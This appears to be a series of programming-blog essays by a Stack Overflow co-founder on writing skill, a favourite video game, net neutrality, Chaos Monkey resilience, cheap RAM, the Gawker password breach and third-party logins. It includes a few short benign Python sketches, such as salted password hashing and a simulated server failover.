How to Write Without Writing
I have a confession to make: in a way, I founded Stack Overflow to trick my fellow programmers.
Before you trot out the pitchforks and torches, let me explain.
Over the last 6 years, I’ve come to believe deeply in the idea that becoming a great programmer has very little to do with programming. Yes, it takes a modicum of technical skill and dogged persistence, absolutely. But even more than that, it takes serious communication skills:
The difference between a tolerable programmer and a great programmer is not how many programming languages they know, and it’s not whether they prefer Python or Java. It’s whether they can communicate their ideas. By persuading other people, they get leverage. By writing clear comments and technical specs, they let other programmers understand their code, which means other programmers can use and work with their code instead of rewriting it. Absent this, their code is worthless.
That is of course a quote from my co-founder Joel Spolsky, and it’s one of my favorites.
In defense of my fellow programmers, communication with other human beings is not exactly what we signed up for. We didn’t launch our careers in software development because we loved chatting with folks. Communication is just plain hard, particularly written communication. How exactly do you get better at something you self-selected out of? Blogging is one way:
People spend their entire lives learning how to write effectively. It isn’t something you can fake. It isn’t something you can buy. You have to work at it.
That’s exactly why people who are afraid they can’t write should be blogging.
It’s exercise. No matter how out of shape you are, if you exercise a few times a week, you’re bound to get fitter. Write a small blog entry a few times every week and you’re bound to become a better writer. If you’re not writing because you’re intimidated by writing, well, you’re likely to stay that way forever.
Even with the best of intentions, telling someone “you should blog!” never works. I know this from painful firsthand experience. Blogging isn’t for everyone. Even a small blog entry can seem like an insurmountable, impenetrable, arbitrary chunk of writing to the average programmer. How do I get my fellow programmers to blog without blogging, to write without writing?
By cheating like hell, that’s how.
Consider this letter I received:
I’m not sure if you have thought about this side effect or not, but Stack Overflow has taught me more about writing effectively than any class I’ve taken, book I’ve read, or any other experience I have had before.
I can think of no other medium where I can test my writing chops (by writing an answer), get immediate feedback on its quality (particularly when writing quality trumps technical correctness, such as subjective questions) and see other peoples attempts as well and how they compare with mine. Votes don’t lie and it gives me a good indicator of how well an email I might send out to future co-workers would be received or a business proposal I might write.
Over the course of the past 5 months all the answers I’ve been writing have been more and more refined in terms of the quality. If I don’t end up as the top answer I look at the answer that did and study what they did differently and where I faltered. Was I too verbose or was I too terse? Was I missing the crux of the question or did I hit it dead on?
I know that you said that writing your Coding Horror blog helped you greatly in refining your writing over the years. Stack Overflow has been doing the same for me and I just wanted to thank you for the opportunity. I’ve decided to setup a coding blog in your footsteps and I just registered a domain today. Hopefully that will go as well as writing on SO has. There are no tougher critics than fellow programmers who scrutinize every detail, every technical remark and grammar structure looking for mistakes. If you can effectively write for and be accepted by a group of programmers you can write for anyone.
Joel and I have always positioned Stack Overflow, and all the other Stack Exchange Q&A sites, as lightweight, focused, “fun size” units of writing.
Yes, by God, we will trick you into becoming a better writer if that’s what it takes – and it always does. Stack Overflow has many overtly gamelike elements, but it is a game in service of the greater good – to make the internet better, and more importantly, to make you better. Seeing my fellow programmers naturally improve their written communication skills while participating in a focused, expert Q&A community with their peers? Nothing makes me prouder.
Beyond programming, there’s a whole other community of peers out there who grok how important writing is, and will support you in sharpening your saw, er, pen. We have our own, too.
If you’re an author, editor, reviewer, blogger, copywriter, or aspiring writer of any kind, professional or otherwise – check out writers.stackexchange.com. Becoming a more effective writer is the one bedrock skill that will further your professional career, no matter what you choose to do.
But mostly, you should write. I thought Jon Skeet summed it up particularly well here:
Everyone should write a lot – whether it’s a blog, a book, Stack Overflow answers, emails or whatever. Write, and take some care over it. Clarifying your communication helps you to clarify your own internal thought processes, in my experience. It’s amazing how much you find you don’t know when you try to explain something in detail to someone else. It can start a whole new process of discovery.
The process of writing is indeed a journey of discovery, one that will last the rest of your life. It doesn’t ultimately matter whether you’re writing a novel, a printer review, a Stack Overflow answer, fan fiction, a blog entry, a comment, a technical whitepaper, some emo LiveJournal entry, or even meta-talk about writing itself. Just get out there and write!
My Holiday in Beautiful Panau
There is a high correlation between “programmer” and “gamer”. One of the first Area 51 sites we launched, based on community demand, was gaming.stackexchange.com. Despite my fundamental skepticism about gaming as a Q&A topic — as expressed on episode 87 of Herding Code — I have to admit it has far exceeded my expectations.
But then maybe I shouldn’t be so surprised. I’ve talked about the relationship between gamer and programmer before:
- Programming Games, Analyzing Games
- Everything I Needed to Know About Programming I Learned from BASIC
- Game Player, Game Programmer
I used to recommend games on this very blog that I particularly enjoyed and felt were worthy of everyone’s attention. I don’t do this a lot any more, now that my blogging schedule has slipped to one post a week, if I’m lucky. (If you’re wondering why, it’s because running your own business is crazy stupid amounts of work when you turn it up to eleven.) Here are a few games I’ve recommended in the past:
- Guitar Hero: Are You Ready to Rock?
- Darwinia
- DEFCON: Shall We Play a Game?
- Company of Heroes
- Living the Dream: Rock Band
- Feeding my Graphics Card Addiction (Fallout 3)
- My Software is Being Pirated (World of Goo)
I haven’t had a ton of time to play games, other than the inevitable Rock Band 3, but I’ve been consumed by another game I had no idea would become so addictive — Just Cause 2.
It’s what you might call an open world sandbox game, in the vein of the Grand Theft Autos. But I could never get into the GTA games, even after trying GTA 3 and its sequels Vice City and San Andreas. They just left me cold, somehow.
Where GTA and its ilk often felt a tad too much like work for my tastes, Just Cause 2 is almost the opposite — it is non-stop, full blown open world pandemonium from start to finish. One of the game’s explicit goals is that you advance the plot by blowing stuff up. No, seriously. I’m not kidding. You have an entire 1000+ square kilometer island paradise at your disposal, filled with cities and military bases, spanning the range from snowy mountains to deserts to idyllic beaches — all just waiting for you to turn them into “chaos points” … by any means necessary.
Of course, you get around by hijacking whatever vehicles happen by, be they boats, airplanes, jumbo jets, cars, tanks, trucks, buses, monster trucks, motorcycles, scooters, tractors or anything in between. Even on foot it is fun to navigate the island of Panau, because the developers gave us an impossibly powerful personal zipline that you can fire at any object in the game to propel yourself toward it. Combine that with the magical parachute you can deploy anywhere, anytime, and they make for some fascinating diversions (parasailing anyone?). You can also use the zipline to attach any two objects together. Think about that for a second. Have you ever wondered what happens when you zipline a moving vehicle to a tree? Or a pedestrian? Or another vehicle? Hmm. As a result, simply going walkabout on the island is more fun than I ever would have imagined.
Between the 49 plot missions, 9 stronghold takeovers, 104 unique vehicles, the optional boat/plane/car/parachute race missions, the opportunities for insane stunt points, the umpteen zillion upgrade crates and faction objects to collect, and the 360+ locations in the 1000+ square kilometers of Panau, there’s always something interesting happening around every corner. And whatever it is, it’s probably beautiful and blows up real good.
In short, Just Cause 2 is deliriously, stupidly, absurdly entertaining. I can’t even remember the last game I completed where I felt compelled to go back after finishing the main storyline to discover even more areas I missed during my initial playthrough and get (most of) the in-game achievements. Whatever amount of time you have to play, Just Cause 2 will happily fill it with totally unscripted, awesome open world pandemonium.
Don’t take my word for it; even the notoriously acidic game reviewer Yahtzee had almost nothing negative to say about Just Cause 2, which is his version of a positive review. And Metacritic gives Just Cause 2 a solid 84. Not that it can’t be improved, of course; after such a sublime sandbox experience, I’m desperately curious to see what they’ll add for Just Cause 3.
Luckily for you, the game has been out long enough that it can be picked up for a song on PS3, Xbox, or PC. Steam has Just Cause 2 on sale right now in an 8 player pack for $60, and Amazon has all versions in stock for under $30. Beware, though, as the PC version does require a pretty solid video card along with Windows Vista or newer — but the upside is that I have mine cranked up to 2048×1152 with almost all the options on, and it rarely dips below 60 fps.
I spent my holidays on the beautiful island of Panau, and I don’t regret a second of it. If you’re looking for a vacation spot, I heartily recommend the open world sandbox of Panau. But while you’re visiting, do be mindful of any errant gunfire, vehicles, and explosions.
The Importance of Net Neutrality
Although I remain a huge admirer of Lawrence Lessig, I am ashamed to admit that I never fully understood the importance of net neutrality until last week. Mr. Lessig described network neutrality in these urgent terms in 2006:
At the center of the debate is the most important public policy you’ve probably never heard of: “network neutrality.” Net neutrality means simply that all like Internet content must be treated alike and move at the same speed over the network. The owners of the Internet’s wires cannot discriminate. This is the simple but brilliant “end-to-end” design of the Internet that has made it such a powerful force for economic and social good: All of the intelligence and control is held by producers and users, not the networks that connect them.
Fortunately, the good guys are winning. Recent legal challenges to network neutrality have been defeated, at least under US law. I remember hearing about these legal decisions at the time, but I glossed over them because I thought they were fundamentally about file sharing and BitTorrent. Not to sound dismissive, but someone’s legal right to download a complete video archive of Firefly wasn’t exactly keeping me up at night.
But network neutrality is about far more than file sharing bandwidth. To understand what’s at stake, study the sordid history of the world’s communication networks – starting with the telegraph, radio, telephone, television, and onward. Without historical context, it’s impossible to appreciate how scarily easy it is for common carriage to get subverted and undermined by corporations and government in subtle (and sometimes not so subtle) ways, with terrible long-term consequences for society.
That’s the genius of Tim Wu’s book The Master Switch: The Rise and Fall of Information Empires.
One of the most fascinating stories in the book is that of Harry Tuttle and AT&T.
Harry Tuttle was, for most of his life, president of the Hush-a-Phone Corporation, manufacturer of the telephone silencer. Apart from Tuttle, Hush-a-Phone employed his secretary. The two of them worked alone out of a small office near Union Square in New York City. Hush-a-Phone’s signature product was shaped like a scoop, and it fit around the speaking end of a receiver, so that no one could hear what the user was saying on the telephone. The company motto emblazoned on its letterhead stated the promise succinctly: “Makes your phone private as a booth.”
If the Hush-a-Phone never became a household necessity, Tuttle did a decent business, and by 1950 he would claim to have sold 125,000 units. But one day late in the 1940s, Harry Tuttle received alarming news. AT&T had launched a crackdown on the Hush-a-Phone and similar products, like the Jordaphone, a creaky precursor of the modern speakerphone, whose manufacturer had likewise been put on notice. Bell repairmen began warning customers that Hush-a-Phone use was a violation of a federal tariff and that, failing to cease and desist, they risked termination of their telephone service.
Was AT&T merely blowing smoke? Not at all: the company was referring to a special rule that was part of their covenant with the federal government. It stated: No equipment, apparatus, circuit or device not furnished by the telephone company shall be attached to or connected with the facilities furnished by the telephone company, whether physically, by induction, or otherwise.
Tuttle hired an attorney, who petitioned the FCC for a modification of the rule and an injunction against AT&T’s threats. In 1950 the FCC decided to hold a trial (officially a “public hearing”) in Washington, D.C., to consider whether AT&T, the nation’s regulated monopolist, could punish its customers for placing a plastic cup over their telephone mouthpiece.
The story of the Hush-a-Phone and its struggle with AT&T, for all its absurdist undertones, offers a window on the mindset of the monopoly at its height, as well as a picture of the challenges facing even the least innovative innovator at that moment.
Absurdist, indeed – Harry Tuttle is also not-so-coincidentally the name of a character in the movie Brazil, one who attempts to work as a renegade, outside oppressive centralized government systems. Often at great peril to his own life and, well, that of anyone who happens to be nearby, too.
But the story of Harry Tuttle isn’t just a cautionary tale about the dangers of large communication monopolies. Guess who was on Harry Tuttle’s side in his sadly doomed legal effort against the enormously powerful Bell monopoly? No less than an acoustics professor by the name of Leo Beranek, and an expert witness by the name of J.C.R. Licklider.
If you don’t recognize those names, you should. J.C.R. Licklider went on to propose and design ARPANET, and Leo Beranek became one of the B’s in Bolt, Beranek and Newman, who helped build ARPANET. In other words, these gentlemen went on from battling the Bell monopoly in court in the 1950s to designing a system in 1968 that would ultimately defeat it: the internet.
The internet is radically unlike all the telecommunications networks that have preceded it. It’s the first national and global communication network designed from the outset to resist mechanisms for centralized control and monopoly. But resistance is not necessarily enough; The Master Switch makes a compelling case that, historically speaking, all communication networks start out open and then rapidly swing closed as they are increasingly commercialized.
Just as our addiction to the benefits of the internal combustion engine led us to such demand for fossil fuels as we could no longer support, so, too, has our dependence on our mobile smart phones, touchpads, laptops, and other devices delivered us to a moment when our demand for bandwidth – the new black gold – is insatiable. Let us, then, not fail to protect ourselves from the will of those who might seek domination of those resources we cannot do without. If we do not take this moment to secure our sovereignty over the choices that our information age has allowed us to enjoy, we cannot reasonably blame its loss on those who are free to enrich themselves by taking it from us in a manner history has foretold.
It’s up to us to be vigilant in protecting the concepts of common carriage and network neutrality on the internet. Even devices that you may love, like an iPad, Kindle, or Xbox, can easily be turned against you – if you let them.
Working with the Chaos Monkey
Late last year, the Netflix Tech Blog wrote about five lessons they learned moving to Amazon Web Services. AWS is, of course, the preeminent provider of so-called “cloud computing”, so this can essentially be read as key advice for any website considering a move to the cloud. And it’s great advice, too. Here’s the one bit that struck me as most essential:
We’ve sometimes referred to the Netflix software architecture in AWS as our Rambo Architecture. Each system has to be able to succeed, no matter what, even all on its own. We’re designing each distributed system to expect and tolerate failure from other systems on which it depends.
If our recommendations system is down, we degrade the quality of our responses to our customers, but we still respond. We’ll show popular titles instead of personalized picks. If our search system is intolerably slow, streaming should still work perfectly fine.
One of the first systems our engineers built in AWS is called the Chaos Monkey. The Chaos Monkey’s job is to randomly kill instances and services within our architecture. If we aren’t constantly testing our ability to succeed despite failure, then it isn’t likely to work when it matters most – in the event of an unexpected outage.
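To make the "degrade, but still respond" idea concrete, here is a minimal sketch in Python. It is not Netflix's code: `fetch_personalized`, `POPULAR_TITLES`, `RecommendationsDown`, and the `failure_rate` knob are all hypothetical names invented for illustration, and the remote call is simulated rather than real.

```python
import random

# Hypothetical static fallback list; not real catalog data.
POPULAR_TITLES = ["Popular Title A", "Popular Title B", "Popular Title C"]


class RecommendationsDown(Exception):
    """Raised when the (hypothetical) recommendations system is unavailable."""


def fetch_personalized(user_id, failure_rate=0.0, rng=random):
    """Stand-in for a call to a remote recommendations system.

    failure_rate simulates how often the dependency is down.
    """
    if rng.random() < failure_rate:
        raise RecommendationsDown(f"no recommendations for user {user_id}")
    return [f"Pick for user {user_id} #{n}" for n in range(1, 4)]


def titles_for_homepage(user_id, failure_rate=0.0, rng=random):
    """Always respond: personalized picks if possible, popular titles if not."""
    try:
        return fetch_personalized(user_id, failure_rate, rng), "personalized"
    except RecommendationsDown:
        # Degrade the quality of the response instead of failing the request.
        return POPULAR_TITLES, "popular"
```

The caller never sees the outage. It only sees a less interesting list, which is the whole point of designing each system to tolerate failure in the systems it depends on.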
Which, let’s face it, seems like insane advice at first glance. I’m not sure many companies even understand why this would be a good idea, much less have the guts to attempt it. Raise your hand if where you work, someone deployed a daemon or service that randomly kills servers and processes in your server farm.
Now raise your other hand if that person is still employed by your company.
Who in their right mind would willingly choose to work with a Chaos Monkey?
Sometimes you don’t get a choice; the Chaos Monkey chooses you. At Stack Exchange, we struggled for months with a bizarre problem. Every few days, one of the servers in the Oregon web farm would simply stop responding to all external network requests. No reason, no rationale, and no recovery except for a slow, excruciating shutdown sequence requiring the server to bluescreen before it would reboot.
We spent months — literally months — chasing this problem down. We walked the list of everything we could think of to solve it, and then some:
- swapping network ports
- replacing network cables
- a different switch
- multiple versions of the network driver
- tweaking OS and driver level network settings
- simplifying our network configuration and removing TProxy for more traditional X-FORWARDED-FOR
- switching virtualization providers
- changing our TCP/IP host model
- getting Kernel hotfixes and applying them
- involving high-level vendor support teams
- some other stuff that I’ve now forgotten because I blacked out from the pain
At one point in this saga our team almost came to blows because we were so frustrated. (Well, as close to “blows” as a remote team can get over Skype, but you know what I mean.) Can you blame us? Every few days, one of our servers — no telling which one — would randomly wink off the network. The Chaos Monkey strikes again!
Even in our time of greatest frustration, I realized that there was a positive side to all this:
- Where we had one server performing an essential function, we switched to two.
- If we didn’t have a sensible fallback for something, we created one.
- We removed dependencies all over the place, paring down to the absolute minimum we required to run.
- We implemented workarounds to stay running at all times, even when services we previously considered essential were suddenly no longer available.
Every week that went by, we made our system a tiny bit more redundant, because we had to. Despite the ongoing pain, it became clear that Chaos Monkey was actually doing us a big favor by forcing us to become extremely resilient. Not tomorrow, not someday, not at some indeterminate “we’ll get to it eventually” point in the future, but right now where it hurts.
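The "switch from one server to two" lesson can be sketched as a toy simulation in Python. This is an illustration under stated assumptions, not our actual setup or Netflix's tool: the `Server` class, `serve`, and `chaos_monkey` are hypothetical names, and "taking a server down" is just flipping a flag.

```python
import random


class Server:
    """A hypothetical web server that can be up or down."""

    def __init__(self, name):
        self.name = name
        self.alive = True

    def handle(self, request):
        if not self.alive:
            raise ConnectionError(f"{self.name} is not responding")
        return f"{self.name} served {request}"


def serve(servers, request):
    """Try each redundant server in turn; fail only if all of them are down."""
    for server in servers:
        try:
            return server.handle(request)
        except ConnectionError:
            continue  # fall through to the next replica
    raise RuntimeError("total outage: no server could handle the request")


def chaos_monkey(servers, rng=random):
    """Knock one randomly chosen server off the network and return it."""
    victim = rng.choice(servers)
    victim.alive = False
    return victim


if __name__ == "__main__":
    farm = [Server("web-1"), Server("web-2")]
    victim = chaos_monkey(farm)
    print(f"Chaos Monkey took down {victim.name}")
    print(serve(farm, "GET /questions"))
```

With two servers in the farm, a single random failure still gets the request answered. With one, the same failure is a total outage, which is roughly the difference we were forced to learn the hard way.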
Now, none of this is new news; our problem is long since solved, and the Netflix Tech Blog article I’m referring to was posted last year. I’ve been meaning to write about it, but I’ve been a little busy. Maybe the timing is prophetic; AWS had a huge multi-day outage last week, which took several major websites down, along with a constellation of smaller sites.
Notably absent from that list of affected AWS sites? Netflix.
When you work with the Chaos Monkey, you quickly learn that everything happens for a reason. Except for those things which happen completely randomly. And that’s why, even though it sounds crazy, the best way to avoid failure is to fail constantly.
24 Gigabytes of Memory Ought to be Enough for Anybody
Are you familiar with this quote?
640K [of computer memory] ought to be enough for anybody. — Bill Gates
It’s amusing, but Bill Gates never actually said that:
I’ve said some stupid things and some wrong things, but not that. No one involved in computers would ever say that a certain amount of memory is enough for all time … I keep bumping into that silly quotation attributed to me that says 640K of memory is enough. There’s never a citation; the quotation just floats like a rumor, repeated again and again.
One of the few killer features of the otherwise unexciting Intel Core i7 platform upgrade* is the subtle fact that Core i7 chips use triple channel memory. That means three memory slots at a minimum, and in practice most Core i7 motherboards have six memory slots.
The price of DDR3 RAM has declined to the point that populating all six slots with 4 GB modules is, well, not cheap, but quite attainable at $299 and declining.
Twenty-four gigabytes of system memory for a mere $299! That’s about $12.50 per gigabyte.
(And if you don’t have a Core i7 system, they’re not expensive to build, either. You can pair an inexpensive motherboard with even the slowest and cheapest triple channel compatible i7-950, which is plenty speedy – and overclocks well, if you’re into that. Throw in the 24 GB of RAM, and it all adds up to about $800 total. Don’t forget the power supply and CPU cooler, though.)
Remember when one gigabyte of system memory was considered a lot? For context, our first “real” Stack Overflow database server had 24 GB of memory. Now I have that much in my desktop … just because I can. Well, that’s not entirely true, as we do work with some sizable databases while building the Stack Exchange network.
I guess having 24 gigabytes of system memory is a little extravagant, but at these prices — why not? What’s the harm in having obscene amounts of memory, making my system effectively future proof?
I have to say that in 1981, making those decisions, I felt like I was providing enough freedom for 10 years. That is, a move from 64k to 640k felt like something that would last a great deal of time. Well, it didn’t – it took about only 6 years before people started to see that as a real problem. — Bill Gates
To me, it’s more about no longer needing to think about memory as a scarce resource, something you allocate carefully and manage with great care. There’s just .. lots. As Clay Shirky once related to me, via one of his college computer science professors:
Algorithms are for people who don’t know how to buy RAM.
I mean, 24 GB of memory should be enough for anybody… right?
* it’s only blah on the desktop; on the server the Nehalem architecture is indeed a monster and anyone running a server should upgrade to it, stat.
The Dirty Truth About Web Passwords
This weekend, the Gawker network was compromised.
This weekend we discovered that Gawker Media’s servers were compromised, resulting in a security breach at Lifehacker, Gizmodo, Gawker, Jezebel, io9, Jalopnik, Kotaku, Deadspin, and Fleshbot. If you’re a commenter on any of our sites, you probably have several questions.
It’s no Black Sunday or iPod modem firmware hack, but it has release notes — and the story it tells is as epic as Beowulf:
So, here we are again with a monster release of ownage and data droppage. Previous attacks against the target were mocked, so we came along and raised the bar a little. How’s this for “script kids”? Your empire has been compromised, your servers, your databases, online accounts and source code have all been ripped to shreds!
You wanted attention, well guess what, You’ve got it now!
Read those release notes. It’ll explain how the compromise unfolded, blow by blow, from the inside.
Gawker is operated by Nick Denton, notorious for the unapologetic and often unethical “publish whatever it takes to get traffic” methods endorsed on his network. Do you remember the iPhone 4 leak? That was Gawker. Do you remember the article about bloggers being treated as virtual sweatshop workers? That was Gawker. Do you remember hearing about a blog lawsuit? That was probably Gawker, too.
Some might say having every account on your network compromised is exactly the kind of unwanted attention that Gawker was founded on.
Personally, I’m more interested in how we can learn from this hack. Where did Gawker go wrong, and how can we avoid making those mistakes on our projects?
- Gawker saved passwords. You should never, ever store user passwords. If you do, you’re storing passwords incorrectly. Always store the salted hash of the password — never the password itself! It’s so easy, even members of Mensa er .. can’t .. figure it out.
- Gawker used encryption incorrectly. The odd choice of archaic DES encryption meant that the passwords they saved were all truncated to 8 characters. No matter how long your password actually was, you only had to enter the first 8 characters for it to work. So much for choosing a secure pass phrase. Encryption is only as effective as the person using it. I’m not smart enough to use encryption, either, as you can see in Why Isn’t My Encryption.. Encrypting?
- Gawker asked users to create a username and password on their site. The FAQ they posted about the breach has two interesting clarifications:
2) What if I logged in using Facebook Connect? Was my password compromised?
No. We never stored passwords of users who logged in using Facebook Connect.
3) What if I linked my Twitter account with my Gawker Media account? Was my Twitter password compromised?
No. We never stored Twitter passwords from users who linked their Twitter accounts with their Gawker Media account.
That’s right, people who used their internet driver’s license to authenticate on these sites had no security problems at all! Does the need to post a comment on Gizmodo really justify polluting the world with yet another username and password? It’s only the poor users who decided to entrust Gawker with a unique username and ‘secure’ password who got compromised.
(Beyond that, “don’t be a jerk” is good advice to follow in business as well as your personal life. I find that you generally get back what you give. When your corporate mission is to succeed by exploiting every quasi-legal trick in the book, surely you can’t be surprised when you get the same treatment in return.)
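For the first two lessons above, here is a minimal sketch of what "store the salted hash, never the password" can look like in Python. It is an illustration, not Gawker's code or a vetted production design. The function names and the iteration count are assumptions, and it uses PBKDF2 from the standard library (a deliberately slow key-derivation function) rather than a single plain hash.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000  # assumed work factor; tune for your own hardware


def hash_password(password, salt=None):
    """Return (salt, digest) for storage; the password itself is never stored."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per user
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, ITERATIONS
    )
    return salt, digest


def verify_password(password, salt, expected_digest):
    """Re-derive the digest from the candidate password; compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected_digest)
```

Because the whole password feeds into the digest, a long pass phrase is not silently cut down to its first 8 characters: typing only the start of it fails verification. And because each user gets a random salt, two users with the same password end up with different stored digests.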
But honestly, as much as we can point and laugh at Gawker and blame them for this debacle, there is absolutely nothing unique or surprising about any of this. Regular readers of my blog are probably bored out of their minds by now because I just trotted out a whole bunch of blog posts I wrote 3 years ago. Again.
Here’s the dirty truth about website passwords: the internet is full of websites exactly like the Gawker network. Let’s say you have good old traditional usernames and passwords on 50 different websites. That’s 50 different programmers who all have different ideas of how your password should be stored. I hope for your sake you used a different (and extremely secure) password on every single one of those websites. Because statistically speaking, you’re screwed.
In other words, the more web sites you visit, the more networks you touch and trust with a username and password combination — the greater the odds that at least one of those networks will be compromised exactly like Gawker was, and give up your credentials for the world to see. At that point, unless you picked a strong, unique password on every single site you’ve ever visited, the situation gets ugly.
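The "greater the odds" claim is simple arithmetic, sketched below in Python. The assumptions are loud ones: every site is treated as independent and equally likely to be breached, and the 2% figure in the usage example is made up for illustration, not a measured rate. If each site has probability p of being compromised, the chance that at least one of n sites is compromised is 1 - (1 - p)^n.

```python
def chance_of_at_least_one_breach(sites, per_site_probability):
    """Probability that at least one of `sites` independent sites is compromised."""
    if not 0.0 <= per_site_probability <= 1.0:
        raise ValueError("per_site_probability must be between 0 and 1")
    return 1.0 - (1.0 - per_site_probability) ** sites


if __name__ == "__main__":
    # 2% per site is a made-up figure for illustration, not a measured rate.
    for sites in (1, 10, 50):
        print(sites, round(chance_of_at_least_one_breach(sites, 0.02), 3))
```

Even a small per-site risk compounds quickly as the number of accounts grows, which is why reusing one password across all of them is the real problem.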
The bad news is that most users don’t pick strong passwords. This has been proven time and time again, and the Gawker data is no different. Even worse, most users re-use these bad passwords across multiple websites. That’s how this ugly Twitter worm suddenly appeared on the back of a bunch of compromised Gawker accounts.
Now do you understand why I’ve been so aggressive about promoting the concept of the internet driver’s license? That is, logging on to a web site using a set of third party credentials from a company you can actually trust to not be utterly incompetent at security? Sure, we’re centralizing risk here to, say, Google, or Facebook — but I trust Google a heck of a lot more than I trust J. Random Website, and this really is no different in practice than having password recovery emails sent to your GMail account.
I’m not here to criticize Gawker. On the contrary, I’d like to thank them for illustrating in broad, bold relief the dirty truth about website passwords: we’re all better off without them. If you’d like to see a future web free of Gawker style password compromises — stop trusting every random internet site with a unique username and password! Demand that they allow you to use your internet driver’s license — that is, your existing Twitter, Facebook, Google, or OpenID credentials — to log into their website.
Your Internet Driver’s License
Back in summer 2008 when we were building Stack Overflow, I chose OpenID logins for reasons documented in Does The World Really Need Yet Another Username and Password:
I realize that OpenID is far from an ideal solution. But right now, the one-login-per-website problem is so bad that I am willing to accept these tradeoffs for a partial worse is better solution. There’s absolutely no way I’d put my banking credentials behind an OpenID. But there are also dozens of sites that I don’t need anything remotely approaching banking-grade security for, and I use these sites far more often than my bank. The collective pain of remembering all these logins — and the way my email inbox becomes a de-facto collecting point and security gateway for all of them — is substantial.
It always pained me greatly that every rinky-dink website on the entire internet demanded that I create a special username and password just for them. Yes, if you’re an alpha geek, then you probably use a combination of special software and USB key from your utility belt to generate secure usernames and passwords for the dozens of websites you frequent. But for the vast, silent majority of normals, who know nothing of security but desire convenience above all, this means one thing: using the same username and password over and over. And it’s probably a simple password, too.
This is the status quo of identity on the internet. It is deeply and fundamentally broken.
But it doesn’t have to be this way. If you open your wallet (or purse, or man-purse, or whatever), I bet you’ll find a variety of credentials you use to prove your identity wherever you go.
The average wallet contains a few different forms of identity with varying strengths:
- Strong: California driver’s license, student ID
- Moderate: credit cards, health insurance card, video rental membership, gym card
- Weak: Albertson’s Preferred Card, Best Buy Rewards Zone Card, Coffee loyalty card
(and sometimes even, uh, cards for free lapdances, apparently)
In the real world, we don’t regularly hold two dozen forms of identity like we expect people to on the web. Not only would you be carrying around the freaking Costanza wallet at that point, it would be insane. In the real world, we somehow manage to get by with about two or three strong forms of identity, complemented by a few other weaker forms to taste.
I’m proposing that our web wallets begin to mimic our physical wallets. Whenever a website needs to know who I am, they should ask to see my Internet Driver’s License.
Now, I don’t literally mean a driver’s license. I’m using this term figuratively to mean online credentials that I can re-use in more than one place on the internet. If all I want to do is leave a comment on a blog — like, say, this one — then one of the weaker forms of identity will surely do. If I’m starting a new bank account, or setting up a profile on a dating website, then maybe a stronger credential from my virtual wallet is necessary.
The core concept that users need to get used to is logging in to a website by showing a third party credential to validate their identity. This idea isn’t nearly as crazy as it seemed in 2008. How many websites can you log into by showing your Facebook, Google, or Twitter credentials now? Lots!
The whole online identity situation may seem as impossible as peace in the Middle East at this point. But when faced with a problem that appears intractable, is your solution to throw your hands up, mindlessly embrace the status quo, and wearily sigh “whaddaya gonna do?”
Some people do that. It’s their right. Personally, I prefer to be the change I want to see. So for us, on Stack Overflow and the Stack Exchange network, that means aggressively promoting the concept of the Internet Driver’s License. Including educating users as necessary.
For example, consider this ATM machine. To use it, do I need to sign up for an account at Shanghai Peking Development Bank? No. I can use any form of trusted third-party credentials the machine supports.
Similarly, to log into any Stack Exchange site, including Stack Overflow, present any OpenID or OAuth 2.0 compliant identity provider as your Internet Driver’s License.
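In practice, "showing" a third party credential starts with the website redirecting you to the identity provider. Here is a minimal sketch of that first step for an OAuth 2.0 authorization code request. The query parameter names come from the OAuth 2.0 specification; the endpoint, client ID, redirect URI, and scope are hypothetical placeholders, and this is not a description of how Stack Exchange implements its login.

```python
import secrets
from urllib.parse import parse_qs, urlencode, urlparse


def build_authorization_url(authorize_endpoint, client_id, redirect_uri, scope="profile"):
    """Return (url, state) for sending a user to an OAuth 2.0 provider.

    The state value is a random token the site should remember and compare
    against the value the provider sends back, to reject forged responses.
    """
    state = secrets.token_urlsafe(16)
    query = urlencode({
        "response_type": "code",   # ask for an authorization code
        "client_id": client_id,    # issued to the website by the provider
        "redirect_uri": redirect_uri,
        "scope": scope,
        "state": state,
    })
    return f"{authorize_endpoint}?{query}", state


# All values below are hypothetical placeholders.
url, state = build_authorization_url(
    "https://provider.example/oauth/authorize",
    "my-client-id",
    "https://mysite.example/login/callback",
)
params = parse_qs(urlparse(url).query)
print(url)
```

The website never sees your password for the provider; it only receives a code it can exchange for proof of who you are.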
When we founded Stack Overflow, we set out with the explicit mission to make the internet better. Adding yet another meaningless username and password to the fabric of the web does not make it better. What does make the internet better is continued pursuit of better, simpler, re-usable forms of third party online identity. That’s why I urge you to join me in supporting OpenID, OAuth 2.0, and any other promising implementations of the Internet Driver’s License.
Trouble In the House of Google
Let’s look at where stackoverflow.com traffic came from for the year of 2010.
When 88.2% of all traffic for your website comes from a single source, criticizing that single source feels … risky. And perhaps a bit churlish, like looking a gift horse in the mouth, or saying something derogatory in public about your Valued Business Partner™.
Still, looking at the statistics, it’s hard to avoid the obvious conclusion. I’ve been told many times that Google isn’t a monopoly, but they apparently play one on the internet. You are perfectly free to switch to whichever non-viable alternative web search engine you want at any time. Just breathe in that sweet freedom, folks.
Sarcasm aside, I greatly admire Google. My goal is not to be acquired, because I’m in this thing for the long haul – but if I had to pick a company to be acquired by, it would probably be Google. I feel their emphasis on the information graph over the social graph aligns more closely with our mission than almost any other potential suitor I can think of. Anyway, we’ve been perfectly happy with Google as our de-facto traffic sugar daddy since the beginning. But last year, something strange happened: the content syndicators began to regularly outrank us in Google for our own content.
Syndicating our content is not a problem. In fact, it’s encouraged. It would be deeply unfair of us to assert ownership over the content so generously contributed to our sites and create an underclass of digital sharecroppers. Anything posted to Stack Overflow, or any Stack Exchange Network site for that matter, is licensed back to the community in perpetuity under Creative Commons cc-by-sa. The community owns their contributions. We want the whole world to teach each other and learn from the questions and answers posted on our sites. Remix, reuse, share – and teach your peers! That’s our mission. That’s why I get up in the morning.
However, implicit in this strategy was the assumption that we, as the canonical source for the original questions and answers, would always rank first. Consider Wikipedia – when was the last time you clicked through to a page that was nothing more than a legally copied, properly attributed Wikipedia entry encrusted in advertisements? Never, right? But it is in theory a completely valid, albeit dumb, business model. That’s why Joel Spolsky and I were confident in sharing content back to the community with almost no reservations – because Google mercilessly penalizes sites that attempt to game the system by unfairly profiting on copied content. Remixing and reusing is fine, but mass-producing cheap copies encrusted with ads … isn’t.
I think of this as common sense, but it’s also spelled out explicitly in Google’s webmaster content guidelines.
